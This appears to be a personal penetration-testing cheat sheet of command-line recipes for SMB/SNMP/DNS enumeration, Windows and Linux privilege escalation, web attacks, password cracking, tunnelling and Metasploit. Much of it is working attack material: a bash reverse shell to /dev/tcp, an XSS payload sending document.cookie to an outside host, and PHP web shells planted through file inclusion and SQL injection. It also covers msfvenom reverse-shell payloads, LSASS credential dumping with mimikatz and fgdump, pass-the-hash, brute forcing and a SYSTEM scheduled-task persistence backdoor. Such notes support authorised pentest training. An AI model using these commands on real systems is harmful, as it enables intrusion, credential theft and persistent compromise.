Pentesting-Notes.txt

smbclient \\\\10.10.10.27\\SYSVOL -U io_active_1 -W foobar.com
smbclient \\\\10.10.10.19\\SYSVOL -U io_active_1 -W foobar.com --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072'
mount -t cifs //10.10.10.19/SYSVOL /mnt -o username=io_active_1,workgroup=foobar.com
mount -t cifs //10.10.10.19/Users /mnt -o username=io_active_1,workgroup=foobar.com,vers=1.0

net use w: \\thin01.example.co.uk\C$ /user:administrator xxxx



Port forwarding on Windows:

netsh interface portproxy show all
netsh interface portproxy reset
netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110
// This rule will redirect all incoming RDP requests (to port 3389) from this computer to a remote computer with an IP address 192.168.1.101.
netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.100.101

netsh interface portproxy add v4tov4 listenport=5555 connectport=80 connectaddress=157.166.226.25 protocol=tcp




@EdOverflow - Enclosed alphanumerics (http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ) can be used to bypass exclusion lists when it comes to SSRF or open redirects. 

+] SSL Testing

git clone https://github.com/drwetter/testssl.sh.git

Test Everything on a Single Host and Output to console

docker run --rm -ti drwetter/testssl.sh -e -E -f -p -U -c 72.2.118.39

Test all hosts on a Subnet and Output to HTML

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U 192.168.1.0/24 | aha > OUTPUT-FILE.html  


+] Test for Anonymous ldap bind:

Set TLS_REQCERT never in /etc/ldap/ldap.conf
// -x switch uses simple authentication instead of of the default SASL
# ldapsearch -H ldaps://37.153.100.231:636 -x

+] Common ports to scan:
nmap -sS -Pn -p 21,22,23,25,53,80,111,135,137,138,139,161,389,443,445,1099,1433,2049,2376,2780,3260,3306,3389,5060,5061,5984,6379,8080,9050,9090,9143,8081,8888,9091,8000,8098,9000,10099,10199,10443,9160,9443,8443,27000,27001,27018,27019,27017,28017 -oA out --open target

Easy RCE Ports (from PTSWARM)
Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999
WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071
JDWP: 45000,45001
JMX: 8686,9012,50500
GlassFish: 4848
jBoss: 11111,4444,4445
Cisco Smart Install: 4786
HP Data Protector: 5555,5556

nmap -sS --open -v -Pn -n -p 1090,1098,1099,4444,11099,47001,47002,10999,7000-7004,8000-8003,9000-9003,9503,7070,7071,45000,45001,8686,9012,50500,4848,11111,4444,4445,4786,5555,5556 -oA easy_rce_scan -iL internal.txt

+] Read environment varaibles of process: sed -e "s:\x0:\n:g" /proc/4387/environ

# nmap --script rmi-dumpregistry.nse -sV --version-all -p 11222 172.26.18.202

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-02-07 08:43 UTC
Nmap scan report for 172.26.18.202
Host is up (0.033s latency).
PORT      STATE SERVICE  VERSION
11222/tcp open  java-rmi Java RMI Registry
| rmi-dumpregistry:
|   idm-cache
|     net.sf.ehcache.distribution.RMICachePeer_Stub
|     @172.26.18.202:11223
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
root@kali:~# nmap --script rmi-vuln-classloader.nse -sV --version-all -p 11222 172.26.18.202

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-02-07 08:43 UTC
Nmap scan report for 172.26.18.202
Host is up (0.033s latency).
PORT      STATE SERVICE     VERSION
11222/tcp open  rmiregistry Java RMI
| rmi-vuln-classloader:
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code executeion.
|
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.53 seconds


+] Compiling java:

If the sources .java are inside a package (for instance com.example), we should create the folder structure to represent that. Then, we compile the project from the root of the package: 

> javac com\example\*.java

To create a JAR, we need to include a MANIFEST.MF and indicate the main-class with the full package:

MANIFEST.MF:

	Manifest-Version: 1.0
	Created-By: 1.8.0_111-3-redhat (Oracle Corporation)
	Main-Class: com.example.Foo

We put this manifest into a folder META-INF.

To create the jar, we need to be at the root of the package and:

> jar -cmf com\example\META-INF\MANIFEST.MF MyJar.jar com\example\*.class


If on the other hand, we do not have files that defines a package, we could perform all this operations inside the same folder that hold the .java source files. In this case, the Main-Class will just contain the name of the class and not a package.


+] Magic Pipe: 

# echo '#!/bin/sh' > connect.sh // This is necessary for the binding with nc
# echo "ncat --proxy 127.0.0.1:9050 --proxy-type socks5  www.google.com  443" >> connect.sh
# chmod +x connect.sh

Two ways of binding stdin/stdout to connect.sh:

1) socat TCP-LISTEN:7777,fork,reuseaddr system:'./connect.sh',nofork
2) nc -e ./connect.sh -nvlp 7777

Now connecting through OpenSSL:

# openssl s_client -connect localhost:7777


+] Try to map and list content of every shared smb resource:
  cat 445.txt | xargs -n1 -i enum4linux -S -w domain -u n3k -p mypass {}

+] Maps a socket at port 8443 in all interfaces of the host issuing the command and redirects all the traffic to 172.x.x.1:443 through the SSH server specified:

  ssh -f -N -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 0.0.0.0:8443:172.x.x.1:443 root@172.x.x.22 -i id_rsa.pem

+] Maps a socket at port 8443 in all interfaces of the SSH server specified and redirects all the traffic that goes into the SSH to 172.x.x.1:443 through the host issuing the command:

  ssh -f -N -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -R 0.0.0.0:8443:172.x.x.1:443 root@172.x.x.22 -i id_rsa.pem


- ssh -o GatewayPorts=true -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 0.0.0.0:8000:172.16.33.91:8080 user@127.0.0.1 -i user.pem


- Compiling i386 with YASM:

yasm -a x86 -f win32 WoW64Shellcode.asm
ld -m i386pe WoW64Shellcode.obj

- Installing a python egg file:
python.exe -m easy_install -Z example.egg

Traffic Account with IPTABLES:
iptables -Z -F
iptables -I INPUT 1 -s 10.0.0.19 -j ACCEPT
iptables -I INPUT 1 -d 10.0.0.19 -j ACCEPT

nmap -sT 10.0.0.19

Then, we can look at the traffic generated to that IP with:
iptables -vn -L


When compiling exe files in kali.. often -lws2_32 switch is needed for programs that use WSAsockets

updatedb
locate sbd.exe

which sbd 

find / -name sbd* -exec file {} \;

Managing Services:

service ssh start
service ssh stop

update-rc.d ssh enable --> enable service persistence 
rconf --> tool to manage boot persistence services


cat index.html | grep href= | cut -d"/" -f3 | grep cisco.com | cut -d'"' -f1 | sort -u
grep -o '[A-Za-z0-9_\.-]*\.*cisco.com' index.html | sort -u

General one by me:
grep -o '[A-Za-z0-9_\.-]*\.*\.com' index.html | sort -u


----------------------------------
#!/bin/bash

for ip in $(seq 200 254); do

ping -c 1 192.168.19.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &

done;
----------------------------------

----------------------------------
#!/usr/bin/python

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *


for i in range(1,211):
    ip = "192.168.1." +str(i)
    pkt = IP(dst=ip)/ICMP()
    a = sr1(pkt, timeout=0.5, verbose=0)
    if a != None:
        print a[0].src + " is Up"
    else:
        print "%s not available" % ip
		
		
----------------------------------

Ncat is an improved netcat version which allows you to specify the IP from where the connection can be made as well as encrypt the traffic with SSL.

ncat -lvp 4444 -e cmd.ex --allow 192.168.30.5 --ssl
ncat -nv 192.168.30.1 4444 --ssl


inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin


							------------------SERIVCES ENUMARATION--------------------------

host -t ns megacorpone.com
host -t mx megacorpone.com

--------------------
#!/bin/bash
for dns in $(cat $(locate dns.txt)); do
  host "${dns}.megacorpone.com"
done;
----------------------

Zone Transfer command:

host -l domain dns.server

dig NS homelinux.net | grep dyndns.org | grep NS | awk {'print $5'} | cut -d"." -f1,2,3 | xargs -n1 -i dig AXFR @{} homelinux.net

dnsrecon -d thinc.local -a -n 192.168.19.221



DNS Server Version:

# nslookup
> set class=chaos
> set type=txt
> server ns1.xxxxx.com
Default server: ns1.xxxxx.com
Address: 12.29.20.XX#53
> version.bind
;; Warning: query response not set
;; Warning: Message parser reports malformed message packet.
Server:		ns1.xxxxx.com
Address:	12.29.20.XX#53

version.bind	text = "Microsoft DNS 6.1.7601 (1DB14556)"




Port Scanning:

TCP Connect(): nc -nvv -w 1 -z 192.168.1.115 80

UDP Scan: nc -unvv -w 1 -z 192.168.1.115 160-165

nmap -sn 192.168.1.0/24 -oG output (sn is ping sweep - previously sP)

SMB Enumeration:

nmap -p 139,445 192.168.1.0/24 --open  (the --open swtich is used in order to show only open ports)

nbtscan 192.168.1.0/24
IP address       NetBIOS Name     Server    User             MAC address 
192.168.1.111    KIQUE-DESKTOP    <server>  <unknown>        1c:6f:65:c3:71:ae
192.168.1.115    IX2-9            <server>  IX2-9            00:00:00:00:00:00            IX2-9 user logged in


rpcinfo 10.10.1.1 --> attempts to get information from rpc server port 111

rpcclient -U "" 192.168.1.115
password:  --> blank

srvinfo
querydominfo
netshareenum
netshareenumall
enumdomusers
queryuser n3k
lookupnames root --> devuelve root S-1-22-1-0 (User: 1)

Se puede empezar una enumaracion de usuarios con:
lookupsids S-1-22-1-0
lookupsids S-1-22-1-1
lookupsids S-1-22-1-2


enum4linux -v 192.168.1.115  
------------------

nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.111


SNMP Enumeration:

/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/wordlist-common-snmp-community-strings.txt


echo "public" > community
echo "private" > community
echo "manager" > community
for ip in $(seq 200 254); do echo 192.168.19.$ip ;done > ips.txt
onesixtyone -c community -i ips.txt

for ip in $(cat out | cut -d" " -f1 | sort -u | grep 192); do echo $ip ; snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 ; done


# snmpget -v 2c -c public 10.90.45.10 1.3.6.1.2.1.1.1.0
iso.3.6.1.2.1.1.1.0 = STRING: "Cisco IOS Software [Denali], ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.3.6, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2018 by Cisco Systems, Inc.
Compiled Wed 28-Feb-18 16:17 by mcpre

# snmpwalk -v 2c -c private 10.90.45.10 -L o | tee snmp.txt


tcpdump -s 0 -A -n 'tcp[13] = 24' and port 80 -i eth0
tcpdump -s 0 -Xn -i eth0 -w mycap.pcap
tcpdump -n -i eth0 -W 1 -C 200 -Z root -w xxx.pcap  // Writes up to 200MB


searchsploit slmail


dirbuster --> program to bruteforce web directories
/usr/share/dirbuster/wordlists/directory-list-1.0.txt


				---------------------PRIVILAGE ESCALATION---------------------

in windows CMD:

	*) systeminfo
	*) dir /a
	*) tasklist /v  (Running processes)
	*) tasklist /svc (Running Services)
	*) set	(get current enviroment settins)
	*) ipconfig /displaydns
	
	SCAN WITH NETSH:::
		FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.140 %i | find "[%i]"

Search the registry - copy (pipe)  to the clipboard (optional)
	reg query HKLM /f password /t REG_SZ /s [ |clip]
	reg query HKCU /f password /t REG_SZ /s [ |clip]

Putty clear text proxy credentials:
	reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"


+] Find Unquoted services: 
wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””


Get-WmiObject -Class Win32_Service | where {$_.PathName -notlike '*system32*'} |  where {$_.StartMode -eq "Auto"} | select pathname | % { $e=".exe" ;$v = $_.pathname -match '^([^\.]*)+'; $output = $matches[0]+$e; icacls $output}

Get-WmiObject -Class Win32_Service | where {$_.PathName -notlike '*system32*'} | where {$_.StartMode -eq "Auto"} | select pathname | % { $v = $_.pathname -match '((?!(\s-|\/\w)).)*'; &icacls $matches[0]}

-----
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
-----


When replacing the original executable file service, you have to "move" the file to another place or change its name, you cannot just overwrite it. 
e.g:
	move scsiaccess.exe scsiaccess.exe.orig
	copy	c:/users/n3k/Desktop/scsiaccess.exe scsiaccess.exe

Look for password string within files:
	findstr /si password *.txt > passwords.txt
	findstr /si password *.xml > passwords.txt
	findstr /si password *.ini > passwords.txt
	
Look for all xml files:

	dir /s *.xml
	

Decrypt password policy preference through NULL Session:

	Nullsession:
	net use \\dc\ipc$ "" /u:""

	Search for cpasswords in gpo's:
	dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt

	Decrypt the cPassword
	gpp-decrypt <string>
	
	
LINUX:
	
	View Sudo Permissions:
	
	sudo -l


	Find cronjobs with weak permissions among other things:
	
		find / -perm -2 ! -type l -ls 2>/dev/null
	
	
	World writable directories:	
		find / -writable -type d 2>/dev/null        
		find / -perm -222 -type d 2>/dev/null     
		find / -perm -o+w -type d 2>/dev/null 

	Word executable directories:
		find / -perm -o+x -type d 2>/dev/null
	
		
	SUID:
		find / -perm -u=s -type f 2>/dev/null
		
		Suid owned by root:
		find / -uid 0 -perm -4000 -type f 2>/dev/null
		
	SGID:
		find / -perm -g=s -type f 2>/dev/null
	
	
	No Owner Files:
		find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files		
		find / -xdev \( -nouser -o -nogroup \) -print
	
	
	Readable logfiles:
		find /var/log -type f -perm -0004 2>/dev/null
	
	
	Find file owned by group:	
		find directory-location -group {group-name} -name {file-name} 2>/dev/null
		
		Where,
			directory-location : Locate the file in this directory path.
			-group {group-name} : Find the file belongs to group-name.
			-name {file-name} : The file name or a search pattern
	
	Find file owned by user:
		find directory-location -user {username} -name {file-name} 2>/dev/null

		Where,
				directory-location : Locate files or directories in this directory location.
				-user { user-name } : Find the file belongs to user.
				-name {file-name} : File name or pattern.
	
	
	Reverse shell:	
		bash -i>& /dev/tcp/192.168.18.84/443 0>&1
		
		
	Linux script enumeration:
	
		https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

	
						---------------------WEB APPLICATION HACKING----------------------

<script>
new Image().src="http://192.168.18.84/s.php?c="+document.cookie;
</script>

Remote File Inclusion:

if (isset( $_GET['LANG'] )) { 
	$lang = $_GET['LANG'];
} else { 
	$lang = 'en';
}
include( $lang . '.php' );

	The next settings must be activated in php.ini in order for this to work properly:
		register_globals = on  http://php.net/manual/es/security.globals.php
		allow_url_fopen = On
		allow_url_include = On
	
	In the attacker machine: <?php echo shell_exec("ipconfig");?>
		
	http://192.168.19.84/addguestbook.php?name=n3k&comment=really+awesome&Submit=Submit&LANG=http://192.168.18.84/evil.txt%00
	The trailing %00 works only on PHP versions below 5.3.1

Local File Inclusion:

	If the above settings are Off (they should be), the vulnerability still exists in the code, allowing a local file inclusion.
	Performing a request that gets logged to the access.log allows us to 
	
	nc -nv victim.com 80
	<?php echo shell_exec($_GET['cmd']); ?>    // This is the request, NO GET NO POST, just that so this is the only text logged in the access  logs
	
	Now we can trigger this code by calling the url:
	
	http://192.168.19.84/addguestbook.php?name=n3k&comment=really+awesome&Submit=Submit&cmd=netstat&LANG=../../../../../../../xampp/apache/logs/access.log%00
	
	<?php $var=$_POST['id'];$text=$_POST['text'];$fp = fopen('$var', 'w');fwrite($fp, '$text');fclose($fp); ?>
	
	
Sql Injection:

	php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

sqlmap:		sqlmap -u http://192.168.19.84 --crawl=1
			sqlmap -u http://192.168.19.84/comment.php?id=738 --dbms=mysql --dump --threads=5
			sqlmap -u http://192.168.19.84/comment.php?id=738 --dbms=mysql --os-shell



				------------------------------PASSWORDS ATTACKS----------------------------------

/usr/share/wordlists

Password Crunch is a technique that attemps to generate all possible combinations of passwords given a character set and a total length.

	crunch 6 6 0123456789ABCDEF -o list.txt
	
	The character set can be one of the sets in charset.lst:
		crunch 4 4 -f /usr/share/crunch/charset.lst misalpha -o mixedalpha.txt
			


The SAM and SYSTEM file is located in “C:\windows\system32\config”. The problem is that these files are locked and hence cannot be copied.
If you want to crack a Win XP password , then you are in luck as windows also stores the backup of SAM and SYSTEM in
” C:\windows\repair “. So you can copy these files from there…
But if you want to crack  Win Vista/7 password, you have to boot into the computer from the live cd of another OS such as ubuntu, and then copy the SAM and SYSTEM from “C:\windows\system32\config”.


 Once you have SAM file and SYSTEM file: 
	
		pwdump SYSTEM SAM
		
			
 FGDUMP --> perform in memory attacks injecting a DLL containing a hash dumping code into the LSASS process.

	0. Dumping as administrator
	fgdump.exe
	
We could then inject the output to john the ripper without even formatting it:
	Performing a total bruteforce attack: john hashes.txt

	1.Dumping the Local Machine Using a Different Account
	fgdump.exe -h 127.0.0.1 -u AnAdministrativeUser

	2.Dumping a Remote Machine (192.168.0.10) Using a Specified User (1)
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser

	3.Dumping a Remote Machine (192.168.0.10) Using a Specified User (2)
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -p l4mep4ssw0rd

	4.Dumping Many Remote Machines, All With the Same Password
	fgdump.exe -f hostfile.txt -u AnAdministrativeUser

	5.Dumping Many Remote Machines, Each With Its Own Username and Password
	fgdump.exe -H combofile.txt

	6.Dumping Many Remote Machines More Efficiently
	fgdump.exe -f hostfile.txt -u AnAdministrativeUser -T 10

	7.Dumping Hosts and Logging Output
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -l myoutput.log

	8.Dumping Hosts, Logging Output and Viewing Verbose Messages
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -l myoutput.log -v -v

	9.Dumping a Host Without Password Histories
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -o

	10.Dumping a Host Without Cachedump or Pwdump Output
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -c (or -w for skipping pwdump)

	11.Dumping Protected Storage
	fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -s
	

Windows Credentials Editor (WCE):

	There is a 32bit and 64bit version
	
	command: wce64.exe -w 
	
	WCE is a replace for Pass the Hash toolkit too, it allows to  authenticate reusing hashes in Window VIsta, Seven and 2008.
	
	the -s option allows to impersonate anoher user with a hash:
	
	wce.exe -s user:domain:LMHash:NTHash
		ie: wce.exe -s ralph:thinc:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
		
		once this is done, we can check the new identity using: wce.exe -l
		
	WCE has two methods for getting the hashes and clear text passwords: Injecting Code and Memory Reading
	The second one is the safest one given that is just a normal read operation. WCE will try to use this method by default, but if it fails will try code injection. To force only the safest mode, run wce.exe -f
	
	More information on: http://www.ampliasecurity.com/research/wcefaq.html
	
	The next registry key specifies which Authentication Packages the OS support. The entered credentials at logon time will be handed to all the authentication packages listed:
	
	*) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
	
	Wdigest stores the clear text password in memory
	
	Digest Authentication Technical Reference
Digest Authentication is a standards-based authentication protocol, implemented through wdigest.dll, that provides for authentication, between Microsoft Windows operating environments and operating environments other than Windows, over the Internet. It is described in RFC 2617: HTTP Authentication: Basic and Digest Access Authentication. Wdigest.dll was first included as an authentication package in the Microsoft Windows XP operating system. The Digest security support provider (SSP) implements both RFC 2617 and RFC 2831: Using Digest Authentication as a SASL Mechanism. Digest Authentication, as a simple authentication and security layer (SASL) mechanism, is used primarily for Lightweight Directory Access Protocol (LDAP) authentication.
Digest Authentication works in situations where the Kerberos protocol does not. Digest Authentication offers single sign-on only to a single Web URL protection space. If users navigate to a different Web site, or even to a different server in the same site, they will usually be prompted to enter credentials again.
	
	
	
Mimikatz:

	copy sekurla.dll \\172.16.x.x\admin$\system32
	psexec /accepteula \\172.16.x.x\ -u username -p password -c mimikatz.exe
	privilege::debug
	inject::process lsass.exe sekurlsa.dll
	
Passing the Hash:	

Performing a bruteforce attack on a NTLM hash can take a while. We might be able to just use the hash as a password given that no SALT is applied to passwords across windows sessions.

	Kali linux comes with a variaty of tools that can perform "passing the hash". They all start with the name "pth-"
		pth-curl pth-rpcclient pth-sqsh pth-winexe pth-wmic pth-net pth-smbclient
	
	We must create an enviroment variable called SMBHASH and put the hash there:
	# export SMBHASH=lm-hash:ntlmhash
	# pth-winexec -U administrator% //192.168.19.84 cmd
			
			
Generating target specific password list:

	cewl www.megacorpone.com -m 6 -w /root/megacorp-cewl.txt  --> this relevant strings with a min of 6 characters from several pages in the website.
	
	Then we can apply password mutation to the minimalistic list generated with john the ripper:
	
		john --wordlist=megacorp-;.txt --rules --stdout > mega-mangled
	
	
	To craft dicts by appending words of or more text files:
	
		while read a; do while read b; do echo "$a$b"; done < users.txt; done < output
	
Online Password Attack:

	Attempt to authenticate against a given network service.
	
	a, Hydra, NCrack

	Medusa against htaccess:
		medusa -h 192.168.19.84 -u admin -P password-file.txt -M http -m DIR:/admin -T 20      --> 20 threads
		
		
	Medusa against a webform authentication:
		medusa -u "" -P /usr/share/wpscan/spec/fixtures/wpscan/wpscan_options/wordlist.txt -M web-form -m FORM:login.html -FORM-DATA:"post?password=" -m DENY-SIGNAL:"Incorrect Password Entered." -T 40 -h 192.168.2.10 -v 10
		
		
	Medusa Pass the Hash Check:
	
		Medusa has a function that allows to check if a pair username/hash is valid in a given system:
		
		medusa -H ip-list.txt -C hashes.txt -M smbnt -m PASS:HASH 
		
			Where: 
				* ip-lists.txt contains all the ip addresses that medusa will check
				* hashes.txt contains the username and hash to test in the form:
					Tester:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
				
		
	
	NCrack is the best for bruteforcing Windows RDP:
		Is not practical to bruteforce with multiple threads given how RDP protocol works. The same happens with netbios/SMB
		ncrack -v -f --user administrator -P password-file.txt rdp://192.168.19.84,CL=1
		
	Hydra supports a wide variaty of protocols:
	
		Example of ftp cracking:	
			hydra -l admin -P password-file.txt -v 192.168.19.84 ftp
			
		SSH Cracking:
			hydra -L users.txt -P pwds.txt ssh://192.168.19.252:22000
			hydra -l bob -P pwds.txt ssh://192.168.19.252:22000
		
		Pass the Hash Check:		
			hydra -l Administrator -p 98ED753F08308A09E59C864B55C8D0AF:4EEBE20597BB1A962A4A81A8F1CF9486 192.168.19.229 -m "LocalHash" smb
			
		Hydra with Proxy:
			HYDRA_PROXY="127.0.0.1:8080"
			
		Hydra htaccess crack:
			hydra -l root -P /usr/share/wordlist/rockyou.txt 10.2.2.250 http-head /restricted -t 5
			hydra http://10.2.2.250/ / http-head -t 10 -w 30 -e s -L /root/oscp/LAB/final.txt -P /usr/share/wordlists/dirb/common.txt HYDRA_PROXY="127.0.0.1:9090"
			
		Hydra Web Form Example:
		
		the "-e s" option enables user as password test 
		e -ns --> username and blank password test
		
			hydra 192.168.19.245 -s 8080 http-form-post "/j_security_check:j_username=^USER^&j_password=^PASS^&LDAPEnable=false&hidden=Select+a+Domain^&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&dynamicUserAddition_satus=true&localAuthEnable=True&logonDomainName=-1&loginButton=login:Username or Password is incorrect" -L /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -e s -o hydra-http-post-attack.txt
			
		
Password Cracking:

	OpenWall website --> hints to discover the type of hash of a hash xD
	
	hash-identifier --> tool to identify hashtype
	
	OCL-Hashcat is an excellent tool to deal with Hashed+Salted passwords
	
CRACK MD5 WORDPRESS HASHES:

	hashcat -m 400 file-with-hash.txt dictionary.txt
	

JOHN The Ripper And Wordlist:
	root@kali:~# john ­-wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump

	If any passwords remain to be cracked, we can next try to apply john’s word-mangling rules with the –rules parameter.
		root@kali:~# john --rules ­-wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
	
	In order to crack linux hashes with john, the passwd and shadow files must be combined:
	
		unshadow /etc/passwd /etc/shadow > unshadowed.txt
		john unshadowed.txt
	
	           ------------------- PORT FORWARDING AND TUNNELING -----------------------------
			   
Port forwarding:
	If a machine only is allowed to perform outbound connections on port 80 and we want to connect from this machine to another one located in a external network to its RDP service, we can use a linux proxy with a port redirection software such as rinetd
	
	vim /etc/rinetd.conf
	
	bindaddress		bindport	TargetAddress		connectport
	Linux-Public-IP	80			Target-Machine-IP	3389
	
	For windows platform: fpipe and winrelay

Reverse SSH Tunnel:

	plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389    --> exposes the RDP port of the machine in the port 3390 of the SSH Server
	
	plink -l root -pw mypassword 192.168.18.84 -R 
	
	
SSH Dynamic Port Forwarding:

	ssh -D 8000 root@owenedSSHserver.com
	ssh -o GatewayPorts=true -D 8000 user@127.0.0.1 -i user.pem

	From here, we now are able to set a proxy that forwards all applications traffic through port 8000. This allow us to attack the internal network from our attacking machine (using our tools) through the compromised SSH Server.
	
	echo "socks4 127.0.0.1 8000" > /etc/proxychains.conf
	
	Then: proxychains nmap -p 21,22,23,80,139,443,445 -sT 192.168.30.0/24 --open
	
		The SCAN type MUST BE sT --- there must be a connection probe in order for this to work.
		  
		  proxychains rdesktop 192.168.30.5
		  
		  
			----------------------- METASPLOIT FRAMEWORK -------------------------------
			
Setup Metasploit in Kali:

	/etc/init.d/postgresql start
	/etc/init.d/metasploit start
	
Auxiliary modules: enumeration , scanning, encoders, etc.

msf> use post/windows/gather/enum_domain        --> useful for detect domain controller

To list related modules about a given keyword: 
	msf> search snmp  --> looks SNMP related modules
	
METERPRETER:
	
	sysinfo
	getuid
	getprivs
	hashdump
	search -f *pass*.txt   -> search in the filesystem for files which have "pass" in their name.
	upload /usr/share/windows-binaries/nc.exe c:\\Users\\0ffsec
	download c:\\windows\system32\calc.exe /tmp/calc.exe
	download -r folderorigin folderdestiny
	shell / exit
	sessions -l
	sessions -i x -->  use session x
	background
	migrate PID
	ps -S winlogon --> search for winlogon process
	
	
	execute -f "cmd.exe" -i -H
	
	execute -f "cmd /c ipconfig /all > c:\temp\x\ips.txt"
	
	
	Determine if UAC is Enabled:
	
	reg queryval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System Value EnableLUA -v EnableLUA
	

Meterpreter HTTPS -->  the meterpreter payload works through a HTTP SSL tunnel connection --> allow us to bypass many content inspection systems
	msf> use windows/meterpreter/reverse_https
	
Reverse TCP ALL PORTS --> useful in situations when we are not sure what egress port are filtered.

Generate msfpayload.exe

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 X > /var/www/reverse.exe

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.18.84 LPORT=6690 X > nice_cat
	
	
Reverse Meterpreter Shell:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.233.135 LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 3 -t python

New version of metasploit (with msfvenom):

msfvenom -a x86 --platform Linux -p linux/x86/shell_reverse_tcp lhost=192.168.1.2 lport=4444 -e x86/shikata_ga_nai -b '\x00' -i 10 -f c

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=80 -e x86/shikata_ga_nai -b '\x00' -i 10 -f raw > payload 
	

Even if we had a meterpreter shell with administrative privileges, we must face UAC. If we try to exec a command such as hashdump , UAC will stop us. This means we should somehow get SYSTEM privileges in the windows box.

msf> use exploit/windows/local/bypassuac
msf> set SESSION x
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LPORT 4446
msf> set LHOST 192.168.18.84

With the above we run a second meterpreter with no UAC restriction, but we still have ADminitrative permissions only. To effectivly achieve SYSTEM privileges we need to migrate to a SYSTEM Process such as Winlogon.


To port foward traffic to a given host within meterpreter:
	IPv4 victim: 10.7.0.22
	Subnet Mask: 255.255.255.0
	
	We must perform a "background" for the current meterpreter session and execute:
		route add 10.7.0.0 255.255.255.0 1        --> where 1 is the meterpreter session ID
	With the above, we created a tunnel to the entire network. Allowing us to use auxiliary modules through the compromised host targeting the network.
	
	We can even port forward an specific port from our kali box to a specific port of a target machine:
		portfwd add -l 445 -p 445 -r 10.7.0.22 
	We're basically tunneling our 445 port to the 10.7.0.22 445 port machine.
	Then, use kali tools (exceeding metasploit framework):
		winexe -U Administrator%SuperPassword //127.0.0.1 "cmd"
		

After breaking into a dual-homed box... We can run the arp_scanner targeting the unknown  network from the meterpreter. This will give us a list of alive machines:
		
meterpreter > run arp_scanner -r 10.1.1.0/24


								------------------------   GOOD TO KNOW       -----------------------

To crack zip files:
		
		fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u bank-account.zip								
								

A common misconfiguration in modern Active Directory enviroments is to have unprotected group policy preference settings files --> this preferences can have juicy information such as "enforce local adminsitrative passwords set by group policy" --> these passwords can be extracted and decrypted from these prefence files to reveal adminsitrative passwords

http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html

gpp-decrypt


Create a task wihich give us a shell every ten minutes:

	schtasks /create /ru SYSTEM /sc MINUTE /MO 10 /tn persist /tr "\"C:\\WINNT\\system32\\msf.exe\""
